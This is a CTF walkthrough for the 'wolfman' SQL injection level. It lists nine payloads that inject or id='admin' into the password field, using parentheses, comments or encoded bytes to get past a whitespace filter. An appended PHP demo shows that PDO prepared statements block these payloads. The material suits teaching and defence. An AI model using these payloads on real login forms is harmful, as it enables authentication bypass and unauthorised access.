
[LOS] wolfman Walkthrough (5)

2020. 12. 5.

Looking at the wolfman challenge, the query ends with and pw='{$_GET[pw]}', so it is executed with whatever value is inserted into pw.

 

One slightly unusual point: in the previous stage the "admin" account was already declared in the query, but this time the query is declared with the "guest" account by default.

 

if(preg_match('/prob|_|\.|\(\)/i', $_GET[pw])) exit("No Hack ~_~");
if(preg_match('/ /i', $_GET[pw])) exit("No whitespace ~_~");

One more filtering check has been added. Looking at the second preg_match, the pattern is "/ /", that is, it checks the input for whitespace.

 

if($result['id'] == 'admin') solve("wolfman");

This part of the source also shows that the challenge is solved only when the returned account is "admin", so using an "or" clause in the injected input to declare id=admin and commenting out the rest of the query should solve it cleanly.

 

Whitespace bypass
 pw=(1)'or(id='admin')%23 --> using parentheses
 pw=1'%0dor%0did='admin'%23 --> carriage return (\r)
 pw=1'/**/or/**/id='admin'%23 --> multi-line comment
 pw=1'+or+id='admin'%23 --> using +
 pw=1'%09or%09id='admin'%23 --> using TAB (\t)
 pw=1'%0aor%0aid='admin'%23 --> line feed (\n)
 pw=1'%0bor%0bid='admin'%23 --> instead
 pw=1'%a0or%a0id='admin'%23 --> instead
 pw=1'%0cor%0cid='admin'%23 --> instead
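
From the defending side, the fix is not a longer blacklist but binding pw as a parameter. The following is an added example, not part of the original post or the challenge's source: it runs the page's two preg_match checks next to a PDO prepared statement over a few of the values listed above. The users table, its rows, the helper function names and the in-memory SQLite database standing in for the challenge's MySQL are assumptions made for the demo.

```php
<?php
// Added example; not the challenge's source. The table, its rows and the
// in-memory SQLite database (standing in for MySQL) are constructed.
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("CREATE TABLE users (id TEXT, pw TEXT)");
$db->exec("INSERT INTO users VALUES ('guest', 'guest-pw'), ('admin', 'admin-pw')");

// The page's two checks, taking the value as a parameter instead of exiting.
function passes_blacklist(string $pw): bool
{
    if (preg_match('/prob|_|\.|\(\)/i', $pw)) return false; // "No Hack ~_~"
    if (preg_match('/ /i', $pw)) return false;              // "No whitespace ~_~"
    return true;
}

// Hardened lookup: pw is bound as data, so a quote, a comment marker or any
// separator byte inside it is compared literally and never parsed as SQL.
function lookup(PDO $db, string $pw): ?string
{
    $stmt = $db->prepare("SELECT id FROM users WHERE id = 'guest' AND pw = :pw");
    $stmt->execute([':pw' => $pw]);
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['id'];
}

// Entries copied from the list above, plus one constructed legitimate value.
$samples = [
    "(1)'or(id='admin')%23",
    "1'/**/or/**/id='admin'%23",
    "1'%09or%09id='admin'%23",
    "1'%0aor%0aid='admin'%23",
    "guest-pw",
];

foreach ($samples as $encoded) {
    $pw = urldecode($encoded); // same decoding PHP applies to $_GET values
    printf(
        "%-28s blacklist=%-5s prepared=%s\n",
        $encoded,
        passes_blacklist($pw) ? 'pass' : 'block',
        var_export(lookup($db, $pw), true)
    );
}
```

The prepared statement does not depend on enumerating separator characters, which is exactly where the "/ /" check falls short.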
